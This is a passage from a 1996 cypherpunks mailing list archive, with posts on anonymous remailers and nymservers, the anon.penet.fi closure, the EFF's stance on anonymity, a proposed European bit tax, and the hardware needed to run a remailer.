damage, that anonymity makes it harder to deter or punish. Like free speech and democracy, anonymity comes with its drawbacks; it's just better than the alternatives. Personally I think each person should have the right to choose how much to identify themselves and how much to be anonymous, in each situation. Without losing their civil rights (like the right to travel, or to speak or publish). John Gilmore PS: I would counsel against the kind of false anonymity provided by the Finnish server, though. Providing information under the promise that it will "never be revealed or misused" is a lot more dangerous than never providing it at all. E.g. "Anonymous cash" that is really based on dossiers or account-numbers isn't anonymous at all. Even physical cash is getting easier to trace; the British government has been tracking money by serial numbers for years, with custom machines in the banks, to de-anonymize Irish freedom-fighters (oops, I mean terrorists). Anonymity is another area, like privacy, where changes from technology can make big social differences. From unicorn at schloss.li Mon Sep 2 15:59:38 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 06:59:38 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <19960902152515012.AAA179@Esther.edventure.com> Message-ID: On Mon, 2 Sep 1996, Esther Dyson wrote: > At least you don't accuse me of being a Communist. Without commenting on the question of intelligence agencies, far left and far right on this issue are fairly non-distinct. > Esther Dyson Always make new mistakes! > EDventure Holdings > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From tcmay at got.net Mon Sep 2 16:02:59 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 07:02:59 +0800 Subject: Silenced Machine Guns Are Safer Than TWA Message-ID: At 6:37 PM 9/2/96, Dave Harman OBC wrote: >tcmay at got.net (Skippy) wrote: > >! At 4:33 AM 9/2/96, qut at netcom.com (Net God) wrote: >! >! >Contrary to popular fiction, ALL firearms have been permanently >! >registered since the 1968 Gun Control Act. The media monopoly lies when >! >they say the contrary. >! >! Nope. Gun sales between individuals without any paperwork were fully legal >! in some places until recently (and may still be fully legal...I can only >! speak of California). > >So? I was talking about NEW sales of firearms from license holders. Let's >consider improving the future rather than preserving the past, shall >we? My apologies! I assumed when you wrote "since the 1968 Gun Control Act" you meant since the 1968 Gun Control Act. I did not realize that you translate "since the 1968 Gun Control Act" into "NEW sales of of firearms." Sorry. I'll consult my qut-dictionary more often. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 16:16:20 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 07:16:20 +0800 Subject: Whistleblowing on the Internet Message-ID: <01I90C52IMZ49JDDSI@mbcl.rutgers.edu> There's also the point that some whistleblowing isn't exactly what some political groups would want to occur. For instance, opponents to unions such as myself aren't going to want a whistleblower to be able conveniently to report their exclusion from a job due to union membership. -Allen From: IN%"adam at homeport.org" "Adam Shostack" 27-AUG-1996 02:41:17.66 To: IN%"geoff at digidem.com" CC: IN%"cypherpunks at toad.com" Subj: RE: Whistleblowing on the Internet Geoffrey Gussis wrote: | Overall, I am quite surprised that there isn't a whistleblowing | clearinghouse on the Internet; a site sponsored by a non-profit that lists | email addresses and secure forms for sending anonymized email to those | areas of the public and private sector that deal with whistleblowing. As | the Internet is a great medium for information dissemination, and offers | significant privacy advantages, I really expected to find much more. Such a clearinghouse is what we call a fat target; something likely to attract attention since wiretapping it could be very useful to an organization that worried about having a whistleblower. As such, the correct attitude towords whistleblowing is to use an anonymous remailer, and send to interested parties. That's how the AT&T deal that sunk the des phones and made clipper a household word was publicized; a member of the list(?) interested party sent a number of interesting documents through remailers to cypherpunks. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From deviant at pooh-corner.com Mon Sep 2 16:16:56 1996 From: deviant at pooh-corner.com (The Deviant) Date: Tue, 3 Sep 1996 07:16:56 +0800 Subject: Cypherpunk Mailboxes? In-Reply-To: Message-ID: On Mon, 2 Sep 1996, Mark M. wrote: > Date: Mon, 2 Sep 1996 13:41:04 -0400 (EDT) > From: "Mark M." > Reply-To: cypherpunks at toad.com > To: cypherpunks at toad.com > Subject: Re: Cypherpunk Mailboxes? > > On Mon, 2 Sep 1996, William H. Geiger III wrote: > > > Hi, > > > > I have a thought for addressing the anon. problem. > > > > We could create a network of anonymous remailers with mailboxes. All > > messages in the mailboxes are stored encrypted. No information about the > > users are keep. Users would be be given x K of mailbox space. > > > > We could use PGP keys for encrypting the messages. Each user would have his > > own key pair for his anonymous mailbox. Any plain text messages received to > > the server would be encrypted on recept. > > > > Let the government's subpoena away. :) > > > > "Sorry we don't have user addresses, no I can't decrypt those messages > > Senator." > > > > What do you think? > > The only problem is there has to be someway for users to retrieve their mail. > The current nym server approach is to use an encrypted reply block to send a > user new mail. This way the nym server doesn't know who the user is. If users > have to actively retrieve their mail, then the feds could install a packet > sniffer on the remailers net link to find out the real email address of an > anonymous user. > > -- Mark > > PGP encrypted mail prefered. > Key fingerprint = d61734f2800486ae6f79bfeb70f95348 > http://www.voicenet.com/~markm/ Hrmm.. perhaps there's a better way... such as having the user and the mail server negoiae a key (i don't really know the details of diffie-hellman or he like, so tell me if this isn't feasable), and have the encryption/decypion routines strip addresses, so that the person is only identifiable by their key... anybody see what i'm saying? --Deviant All extremists should be taken out and shot. From tim at ora.com Mon Sep 2 16:17:36 1996 From: tim at ora.com (Tim O'Reilly) Date: Tue, 3 Sep 1996 07:17:36 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: Message-ID: <199609022105.OAA03983@isla.west.ora.com> John, Your statements seem like a position I could sign up to as an official EFF position... -- Tim O'Reilly @ O'Reilly & Associates, Inc. Publishers of Nutshell Handbooks 103 Morris Street, Sebastopol, CA 95472 707-829-0515 ext 266, Fax 707-829-0104, tim at ora.com Check out http://www.ora.com, http://website.ora.com, http://www.songline.com From hallam at ai.mit.edu Mon Sep 2 16:21:33 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Tue, 3 Sep 1996 07:21:33 +0800 Subject: SCO giving free licenses to UNIX OpenServer In-Reply-To: <5025qi$k65@life.ai.mit.edu> Message-ID: <322B4E8E.41C6@ai.mit.edu> Eric Murray wrote: > > Scottauge at aol.com writes: > > Read, Understand, and Delight... Microsoft maybe in trouble at last. > > I doubt it. People don't use Microsoft products because > of their quality or functionality. Errmm.. hate to disappoint but SCO UNIX started life as Xenix which was written by Microsoft in the dark ages. > > This is for single user home based UNIX systems. > > Single-user UNIX isn't all that useful. Multi-user ain't much better. Listen to the guys who built it. UNIX is a program development environment. In the early years it was interesting because there was source available, that ceased to be the case years ago. Today Linux probably represents the future of the UNIX familly, it allows people who want to hack at the OS level access to the sources of a fully functioning OS. This allows people to add in new kernel features, schedulers and other exotica without having to write a whole new O/S. Just don't confuse it with "home computing", this is geek computing and you better have a lot of interest in computing to use it. Home computing is the market for users who need a system thats simpler than a VCR or they can't use it. At one time that meant Apple, today it means Microsoft, it will never mean Linux - not unless someone can make Linux much much simpler than it is at present and provide decent WISIWIG tools such as editors etc. designed for use by aunt Ethel. Phill From nobody at cypherpunks.ca Mon Sep 2 16:44:09 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Tue, 3 Sep 1996 07:44:09 +0800 Subject: strengthening remailer protocols In-Reply-To: <9608231805.AA01523@clare.risley.aeat.co.uk> Message-ID: <199609022125.OAA17259@abraham.cs.berkeley.edu> I don't really see the use of this complicated scheme. The main problem seems to be that if M floods remailer R with messages to B, and A sends a message to C through R, then it will be clear to M that A's message was destined for C. Rather than divert messages, then, I propose that for each input message there is a 10% chance that a piece of cover traffic is generated. Thus, if M sends 50 messages through R and sees 6 outgoing messages going to remailers C, D, and D, he will now know which messages correspond to the message that A send through. From mix-admin at nym.alias.net Mon Sep 2 18:06:48 1996 From: mix-admin at nym.alias.net (lcs Remailer Administrator) Date: Tue, 3 Sep 1996 09:06:48 +0800 Subject: Too few nymservers In-Reply-To: <199609021918.VAA21564@basement.replay.com> Message-ID: <199609022157.RAA01689@anon.lcs.mit.edu> > [snip] > > There has to be more crypto anonymizing aliasing remailers and with > > easier interfaces. Closing the Kleinpaste derived server will help > > put the pressure of demand to start better remailer systems. > > There's not enough capacity and reliability with the servers extant. > > There should be thousands of full featured remailers. > > Exactly. Sometimes *all* the nymservers are down at the same time. Well, I just designed a nymserver that's probably more complicated and difficult to use than any previous one. From this experience, I have concluded that if you want to design a remailer with real security (as opposed to a penet-style server), it just won't be easy to use that remailer manually. Even alpha.c2.org was kind of a pain to use manually. I therefore think in the long run it's better to bite the bullet, write as secure a nym server as possible, and expect that people will use special client software to use the remailer. Incidentally, if anyone else wants to run another nym.alias.net-style remailer, the code is available and I'd be glad to help anyone set things up if that person is serious about running a nymserver. From paul at fatmans.demon.co.uk Mon Sep 2 18:11:51 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 3 Sep 1996 09:11:51 +0800 Subject: New cryptography www site Message-ID: <841692280.5131.0@fatmans.demon.co.uk> Hi all, Just announcing my cryptography www site, it`s very new so the content isn`t all there yet but it`s worth a look, email me and tell me what you think, also if anyone has any research papers on cryptography in ASCII, doc etc.. formats could they email them to me for putting on the pages... the URL is Http://www.fatmans.demon.co.uk/crypt/index.htm Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From spg at dds.nl Mon Sep 2 18:28:28 1996 From: spg at dds.nl (SPG) Date: Tue, 3 Sep 1996 09:28:28 +0800 Subject: FWD: Another try to kill democracy Message-ID: <322B5766.60F8C2BB@dds.nl> Hi Y'all, I just got wind that the German government is planning to force german ISP's to shut off access to my ISP, XS4ALL, because the german magazine 'Radikal' has a web page on xs4all. This magazine is a radical left wing magazine of the type that in the netherlands is 13 in a dozen, and in germany (obviously) labelled 'terrorist'. The issue here is not my political beliefs (quite distant from radical I can assure you) but the fact that the german government does NOT see fit to extradite nazi war criminals, to fire Judges, DA's and other powerfull officials who were member of the nazi party during WW2, or to take steps towards closing access to US neo-nazi sites, but DOES deem it necessary to shut off an entire server because of a (in the netherlands perfectly legal) left wing magazine. Not so much is changed after all I guess. As student history I can name several people also labelled 'terrorist' before by a government, who were not. 'Terrorist' is the name opressive and undemocratic Junta's use for their opposition. Please considder mirroring or linking to this site. THIS IS A MATTER OF PRINCIPLE!! It has litle to do with the actual content of the page (wich is quite harmless) URL: http://www.xs4all.nl/~tank/radikal/index.htm or contact tank at xs4all.nl REMEMBER! NEXT OPINION LABELLED 'UNWANTED' BY A GOVERNMENT, MAY BE YOURS!! Greetz. DD. -- --__+==[ NOTE!! This e-mail adress is read by several different people, due to the fact that it is in use as mailing adress for our editorial staff (TRIBE MAGAZINE), If your message is of a personal nature, and is not to be reposted or used in our magazine , please state so. NOTE: we maintain the right to ignore this, if it has news value. ]==+--__ From jimbell at pacifier.com Mon Sep 2 18:31:01 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 09:31:01 +0800 Subject: "Bit Tax" article in EET Message-ID: <199609022015.NAA09677@mail.pacifier.com> August 26, 1996, Electronics Engineering Times, Page 4 "Europe wary of bit tax" By Peter Clarke Maastrict, Netherlands Since it surfaced in a report prepared for the European Commission earlier this year (see April 29, page 1) the idea of a "bit tax" on data communications has received a mixed response in Europe. Feedback has ranged from calls for adoption and implementation from within the Belgian government, to a qualified rejection by one vice president of the European Commission (EC), to disjust and disbelief amonst individual Interenet users, particularly in Italy. The bit tax idea, only a very minor part of an interim report, has received a great deal of publicity from private individuals, who seem to be the most upset, fearing state interference as an attempt to tax freedom of speech. Luc Soete, director of the Maastrict Economics Research Institute on Innovation and Technology, has been heavily flamed via e-mail since the report's publication. As chairman of the so-called High Level Experts Group (HLEG) which authorited the report, it was he who included just one clause in about 100 pages of text, calling for an investigation of the taxing of data transmission over networks, and particularly over the internet. [JB: I can't resist adding a comment here. One of the most threatening aspects of this "bit tax" idea (even far more important than the value of the money paid) is the fact that it would make all ISP's and Internet users automatically subject to "tax evasion" charges which would just be a smokescreen for content investigation, and would automatically "justify" wiretaps where content-based investigation would be impossible. It is very likely that threatening an ISP with such charges would cause him to become more cooperative, and the difficulty in calculating and verifying the accuracy of the taxes paid would make everyone an inadvertent criminal, which would give the government enormous leverage it wouldn't otherwise have. The way I see it, anyone who values freedom who would otherwise support a bit-tax-type proposal should run into a brick wall with this problem, and join the opposition to it right here.] Speaking at a conference on telecommuting, the Belgian Minister for Telecommunications, Elio Di Ruppo, came out as a supporter of the bit tax. But the Flemish government, which is responsible for half of Belgium, claims a bit tax would undermine its efforts in promoting information technology within its territory. The report was prepared for DG-V, the department of the EC responsible for social affairs, but Martin Bangemann, the EC vice president who heads up DG-XIII and is responsible for information technology and telecommunications, has expressed concern over the impact of a bit tax. Issues include economic growth and roll out of next-generation information and communications technologies and how a bit tax could be implemented. The EC's official position on the bit tax is that it has no position. "This is only an interim report at the moment," said a spokesman for the DG-V. "The bit tax idea may not even be present in the final report." Not Possible? "The big problem is that it's a nice idea, but implementation may not be possible at the European level," the spokesman continued. It may have to be set at the world level. At the moment, we are waiting for the final report." Officials responses to the interim report, from government and industry bodies, have been generally favorable but often don't mention the bit tax, Soete said. "The bit tax responses have been much more individual. It just goes to show that people don't read reports, but they do read newspapers." Soete continued: "E-mail responses have been very offensive, very negative." Reluctant to give examples, Soete admitted that many e-mail messages had attacked him personally but that the gist was "keep your hands off the Internet." Those responses, as well as more cogent arguments put forward, have prompted Soete to publish a second paper, titled: "The bit tax: the case for further research." In this, Soete has recast the bit tax as a replacement for the value-added tax (VAT) on information-technology goods and services, rather than as an additional tax. "There was an issue of double taxation there, which it is hard to justify," he said. VAT is a European-wide system of taxation on consumption roughly equivalent to the US sales-tax system: It is typically set at 17.5 percent of the untaxed value. Soete argued that VAT is heavily based on ideas of material inputs at different states through a chain of manufacture and is not well-suited to "intangible" services. He pointed out that a telephone call is currently priced and taxed in relation to the distance and time. Instead, Soete proposes the bit or byte--rather than the second--as the fundamental unit of measure. Taxation on that basis might save small-scale users money while increasing the tax burden on large-scale users. "This is a new system of communications, and the assumption that we should be able to use it without any taxation is ridiculous," Soete said. As planned, the HLEG will rewrite its report in light of responses and further research by the end of 1996 before submitting it to DG-V, which is then expected to call for some of the particular recommendations to be investigated in 1997. [end of article] Jim Bell jimbell at pacifier.com From um at c2.org Mon Sep 2 18:31:22 1996 From: um at c2.org (Ulf Moeller) Date: Tue, 3 Sep 1996 09:31:22 +0800 Subject: EFF chairwoman: Anonymity proven not to be a positive factor Message-ID: >From a Scientology magazine: Esther Dyson, member of the board of directors of the Electronic Frontier Foundation and member of the National Information Infrastructure Advisory Council, spoke on the anonymity issue at the fifth Computers, Freedom & Privacy (CFP) conference in San Francisco. [...] "I have a concern about the spread of bad behavior on the Net," said Dyson. "Anonymity figures into this, and I feel that it has proven to not be a positive factor. It breaks down the community which we are seeking to build, and cout protection and privacy laws already exist and should be applied in a broad way, such that they are transparent to new wrinkles in the technology. It is not necessary to view the world of the Net as different from the rest of the world." http://www.anonymizer.com:8080/http://www.theta.com/goodman/hijack.htm [For EFF's former position on anonymity, see http://ftp.sterling.com:80/COAST/doc/law+ethics/EFF-Anonymity] From molnard1 at nevada.edu Mon Sep 2 18:47:26 1996 From: molnard1 at nevada.edu (DAVID A MOLNAR) Date: Tue, 3 Sep 1996 09:47:26 +0800 Subject: Question re: MD5/other key-crunching methods Message-ID: On the plane back home, I had the pleasure of being treated to a screening of "Sgt. Bilko". Not a bad movie overall, but had a nice throwaway crypto line. It got me to thinking, though... Is it possible to make generalizations about the MD5 hashes of classes of input values? That is, can one say that "no input values of length greater than 512 bits will..." or 'all input values starting with the value 3 have a tendency to..." with any degree of probability? I know hash functions strive to evenly distribute values over their range, but I wonder if it might sometimes be possible to predict the hash of a value without computing it. Why? Well, it's mainly in regards to the way MD5 and other hash functions are used in mapping pass phrases to actual key values for a cipher. Suppose I have a situation in which I feel comfortable in making certain generalizations about the passphrase. Perhaps it's all lowercase, perhaps all alphanumeric, has five hyphens, whatever. Information which may allow one to restrict the passphrase to a certain range. In a system where the passphrase is the encryption key, that range of key values can be doled out and searched sequentially. Since they are likely to be one or several contiguous blocks, one may simply distribute the task of searching each one to willing machines everywhere. The efforts with respect to RC4-40 in the previous year prove that much. If I can rule out even 10% of all possible keyvalues, I've saved a good deal of time. What if one is dealing with a passphrase key-crunched w/MD5, though? The obvious way to go about it is to compute the MD5 hash for each and every value in the given range, then test that set of keys. This is an extra step, and adds a measure of extra time to the whole operation. Sure, one may abstract it away by claiming it's trivial compared to the problem of searching an exponetially large keyspace, but that seems something of a cop-out. Perhaps it's a silly question, but is it possible to identify a set of hashes which correspond to a set of domain values w/o performing the hash itself? I'm aware that it's not possible to reverse a one-way hash like MD5 (wish we could...what a compression ratio!), and I know "good" hash functions strive for properties which would make this exceedingly difficult. However, has anyone looked at the question? Is it worth considering? Thanks. -David Molnar From unicorn at schloss.li Mon Sep 2 18:53:07 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 3 Sep 1996 09:53:07 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609022132.OAA16572@eff.org> Message-ID: On Mon, 2 Sep 1996, Stanton McCandlish wrote: > > > What is or is not your personal or EFF's official position is meaningless. > > > It is clear that the personal beliefs of those involved in EFF are > > > those of compromise, present day politics, and a general lack of moral > > > fiber. > > But that's not clear at all, since none of you have access to internal > discussion on this or any other topic here. Esther's position is one of > guarded caution. Our former board member David Johnson's was one of > almost complete anti-anonymity (a fact that probably had a lot to do with > his leaving the board), while other board and staff members are 100% > pro-anonymity, and yet others are middleground or entirely silent on the > topic. Why am I any more mistaken for pointing out that a single influential member of EFF's staff or board is anti-anonymity and yet remains with the organization than you are for pointing out that a single influential member who happened to be anti-anonymity has left? If my position, as you represent, is misguided, surely your point about Mr. Johnson is equally so. If the board is almost 100% pro-anonymity, where's the official position? In so far as an organization is much defined by those involved, I think it entirely right to wonder aloud about the personal motives of the staff and board. I think this PARTICULARLY prudent given EFF's reputation and prior conduct. I would be most happy to be proven wrong and see EFF suddenly, in a burst of impressive moral fiber, speak out publically and take some political action to assure anonymous communication. > > Things simply are not as black and white as they might seem. > Well, let's have a clear official position issued then to end all dispute. > > I agree with you whole-heartedly. I am stunned by the EFF's position on > > this matter and they no longer have my support. Here are some more > > of Dyson's statements on this subject. > > You've not been reading very carefully. There is no "EFF's position on > this matter". There is just Esther Dyson's position on this matter, > and quoted out of context. Maybe there should be an EFF position on the matter. What is EFF doing if not supporting anonyminity? I'm hardly going to support an organization that proports to be pro-internet freedom and yet has no official position on anonyminity. Of course you should expect people to wonder about EFF when you have no official position and yet some staff and board members seem to have a statist bent. > -- > Stanton McCandlish >
mech at eff.org >

Electronic Frontier Foundation >

Online Activist -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From MAILER-DAEMON at mqg-smtp3.usmc.mil Mon Sep 2 18:59:07 1996 From: MAILER-DAEMON at mqg-smtp3.usmc.mil (MAILER-DAEMON at mqg-smtp3.usmc.mil) Date: Tue, 3 Sep 1996 09:59:07 +0800 Subject: Undeliverable Message Message-ID: To: Cc: Subject: Re: Cypherpunk Mailboxes? Message not delivered to recipients below. Press F1 for help with VNM error codes. VNM3043: BANYAN SERVER at MAG26@2DMAW NEW RIVER VNM3043 -- MAILBOX IS FULL The message cannot be delivered because the recipient's mailbox contains the maximum number of messages, as set by the system administrator. The recipient must delete some messages before any other messages can be delivered. The maximum message limit for a user's mailbox is 10,000. The default message limit is 1000 messages. Administrators can set message limits using the Mailbox Settings function available in the Manage User menu (MUSER). When a user's mailbox reaches the limit, the user must delete some of the messages before the mailbox can accept any more incoming messages. UNDEFINED-----BEGIN PGP SIGNED MESSAGE----- On Mon, 2 Sep 1996, William H. Geiger III wrote: > Hi, > > I have a thought for addressing the anon. problem. > > We could create a network of anonymous remailers with mailboxes. All > messages in the mailboxes are stored encrypted. No information about the > users are keep. Users would be be given x K of mailbox space. > > We could use PGP keys for encrypting the messages. Each user would have his > own key pair for his anonymous mailbox. Any plain text messages received to > the server would be encrypted on recept. > > Let the government's subpoena away. :) > > "Sorry we don't have user addresses, no I can't decrypt those messages > Senator." > > What do you think? The only problem is there has to be someway for users to retrieve their mail. The current nym server approach is to use an encrypted reply block to send a user new mail. This way the nym server doesn't know who the user is. If users have to actively retrieve their mail, then the feds could install a packet sniffer on the remailers net link to find out the real email address of an anonymous user. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMiscESzIPc7jvyFpAQGQ8ggAoHoGwwLI/8WI3XEBvA/Yo/lOPu1bQGYZ +m/jYzZjlF/YcS54J+H+L+xRo9WcOJkm7LLetTRZM3N/vG71M01vLcoOnfciRjFz AhLj2V5DGEcyQE0GMBXOxgxKvnzMVkFJh6ZWFalIM0DedncdX541W3j+almPb7Yr YyT+On5mqbPd0U5rJgv2CfE5CFlAE7XyO0KteH5aONK3f6TxzGH4cGG8wSZaBiu4 jP55nTl8VdtMH7MBDqOFkAH7IOboDZzjDglbuFHFk/nhtKfYIzg4c/ck5VCZ1vs8 xIqaPIMzpQF/smfKS2upyhZB1fb3G101lUJmjoVkEATQhwMzLBhY1Q== =QbyB -----END PGP SIGNATURE----- From jya at pipeline.com Mon Sep 2 19:03:31 1996 From: jya at pipeline.com (John Young) Date: Tue, 3 Sep 1996 10:03:31 +0800 Subject: FWD: Another try to kill democracy Message-ID: <199609022352.XAA09328@pipe5.t1.usa.pipeline.com> On Sep 02, 1996 21:53:42, 'SPG ' wrote: >As student history I can name several people also labelled 'terrorist' before >by a government, who were not. 'Terrorist' is the name opressive and >undemocratic Junta's use for their opposition. --------- >From the US journal "Foreign Affairs," Sep/Oct, 1996: Postmodern Terrorism Since 1900, terrorists' motivation, strategy, and weapons have changed to some extent. The anarchists and the left-wing terrorist groups that succeeded them, down through the Red Armies that operated in Germany, Italy, and Japan in the 1970s, have vanished; if anything, the initiative has passed to the extreme right. Governments and media in other countries do not wish to offend terrorists by calling them terrorists. The French and British press would not dream of referring to their countries' native terrorists by any other name but call terrorists in other nations militants, activists, national liberation fighters, or even "gun persons." ---------- For the full 30kb essay see: http://jya.com/pothot.txt From jamesd at echeque.com Mon Sep 2 19:03:59 1996 From: jamesd at echeque.com (James A. Donald) Date: Tue, 3 Sep 1996 10:03:59 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) Message-ID: <199609021945.MAA05331@dns2.noc.best.net> At 09:04 PM 9/1/96 -0400, Alan Horowitz wrote: > The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. > > If my memory serves, the Iranian jetliner had its squawker turned off, or > broken. Your memory does not serve: The computers record of the events was: Computer tells crew: Civilian jetliner on radar. Crew expecting an attack by jetfighters, tell computer to shoot it down. Computer does not put up a bunch of dialogs saying: "Hey, I think this is a CIVILIAN airliner, did you get that CIVILIAN airliner, are you quite sure you want it shot down? Instead it just shoots it down. Human error by the American military. Possibly poor user interface on the computer. Possibly indifference to civilian lives by the American military. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From wb8foz at nrk.com Mon Sep 2 19:14:18 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 3 Sep 1996 10:14:18 +0800 Subject: [NOISE] Re: FLT 800: From the Rumor Mill... In-Reply-To: <199609020352.FAA29463@basement.replay.com> Message-ID: <199609022357.TAA06324@nrk.com> Anonymous sez: > > > Well, not quite the same situation. IIRC, the Iranian aircraft refused to resp > > The Iranian Airbus was also flying out of what was essentially "hostile" airsp > > Feel free to correct my memory if I'm wrong. I wish I had an off-list way to say this: Mr Anonymous: won't you please fix your posting s/w so it break lines correctly? It's a Royal PITA to deal with as it is.... Often I do want to read your comments, but when you make it a hassle... (I now return to the flame war already in progress...) -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From stewarts at ix.netcom.com Mon Sep 2 19:18:54 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 10:18:54 +0800 Subject: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.) Message-ID: <199609030003.RAA03934@toad.com> C Matthew Curtin posted a reference to ALPHACIPHER, which appears to be Yet Another Snake Oil System. It's got good intentions - it uses (ahem) "one-time pads", and tries to build a convenient user interface for low-volume work. Of course, it apparently doesn't quite get it: > ALPHACIPHER uses key sets generated by a > proprietary random key set generator > to insure the production of unique, high-quality keys. The key set generation is inherently part of the encryption process; since it's proprietary, it's not possible to test the quality of the random numbers, but they must be assumed to be low-quality crackable stuff unless the author is willing to reveal the algorithm and demonstrate otherwise. The program is written in DOS, and produces its output as UPPERCASE LETTERS to avoid being caught by eavesdropping scanners that might detect other patterns. Not unreasonable, I guess. The author, Wolfgang Hammersmith, also wrote The New ADFGVX, a cypher that can be done by hand (if necessary), which he does acknowledge is breakable, but comments that for short messages, there may not be enough information to break it. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From tcmay at got.net Mon Sep 2 19:19:17 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 10:19:17 +0800 Subject: strengthening remailer protocols Message-ID: At 9:25 PM 9/2/96, John Anonymous MacDonald wrote: >I don't really see the use of this complicated scheme. The main >problem seems to be that if M floods remailer R with messages to B, >and A sends a message to C through R, then it will be clear to M that >A's message was destined for C. > >Rather than divert messages, then, I propose that for each input >message there is a 10% chance that a piece of cover traffic is >generated. Thus, if M sends 50 messages through R and sees 6 outgoing >messages going to remailers C, D, and D, he will now know which >messages correspond to the message that A send through. This type of attack is why "reply-block" schemes are fundamentally flawed. Any such scheme gives an attacker (a traffic analyst) a wedge with which to deduce mappings. It is a kind of "chosen plaintext" attack (loosely speaking). Or a "forcing attack." Maybe a "flooding attack" is as good a name as any. One floods the reply block and simply watches where the water goes. (If there were more academics in the crypto community looking at digital mix issues, there would likely be clever names for the various attacks.) Several folks on this list, including (from memory), Scott Collins, Wei Dai, Hal Finney, myself, and others, have noted this weakness over the years. Note that merely fiddling around with probabilities of transmission, such as described above, will not be enough. This just adds a layer of noise, which will disappear under a correlation analysis. (For newcomers, there are interesting parallels between statistical analysis of ciphers and similar analysis of remailer networks. And lots of statistical tools can be used to deduce likely mappings based on source/sink correlations, digram analysis, etc. Making a remailer network robust against such analyses will take a whole more basic thinking. Merely increasing message volume is not enough. Nor is increasing latency enough. Generally speaking, of course.) Instead of reply blocks, I think use of message pools (a la BlackNet) is a more robust reply method, as it uses "widely-distributed messages" (a la Usenet newsgroups) to get around the source/sink correlation issue. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ghio at netcom.com Mon Sep 2 20:02:45 1996 From: ghio at netcom.com (Matthew Ghio) Date: Tue, 3 Sep 1996 11:02:45 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <199609011922.OAA31806@manifold.algebra.com> Message-ID: <199609022129.OAA02339@myriad> Someone wrote: : ! > I remember the load on anon.penet.fi was something like 7500 messages : ! > daily. As for connection, you will need 64kbps line or even less in case : ! > you compress the messages. The machine could be either an older Sun Sparc : ! > or a PC running free Unix (Linux/FreeBSD/...) anon.penet.fi actually used a 486/66 running FreeBSD. Dave Harman OBC (qut at netcom.com) wrote: : ! I suggest the following configuration: a IBM 486 PC with 16MB of : ! RAM and 28.8 modem, running qmail instead of sendmail and Linux, : : How is qmail better than sendmail? The default BSD sendmail since 8.00+ : has automated ident requests built in. It can easily be compiled without : that default option, for greater efficiency. Disable reverse-DNS too... : ! on a dedicated 28.8 PPP line. The cheapest used VGA display from : ! the nearby waste dump will work just fine. : : Hell, any monitor should work! You don't need a monitor at all. Since we're assuming that the remailer is a dedicated machine, and you'll do your real work on another computer, just plug a null modem cable into the serial ports and use a terminal program on your other computer. : ! Estimated cost: $700-1000 for the system, $50-100/month for the : ! connection, and 3 hours per day to deal with mailbombing from $500 tops. 8MB is probably okay, 16 might improve resistance to mailbombs a bit tho. You can get 486 motherboards for under $100 nowadays. Do the math: used 486 MB+CPU: $100 16MB RAM: $150 case+powersupply: $50 100MB HD: $20 HD Controller: $15 Dual 16550 Serial Card: $15 28800bps Modem: $150 ------ $500 And if you really want to run a remailer, I can sell you most of 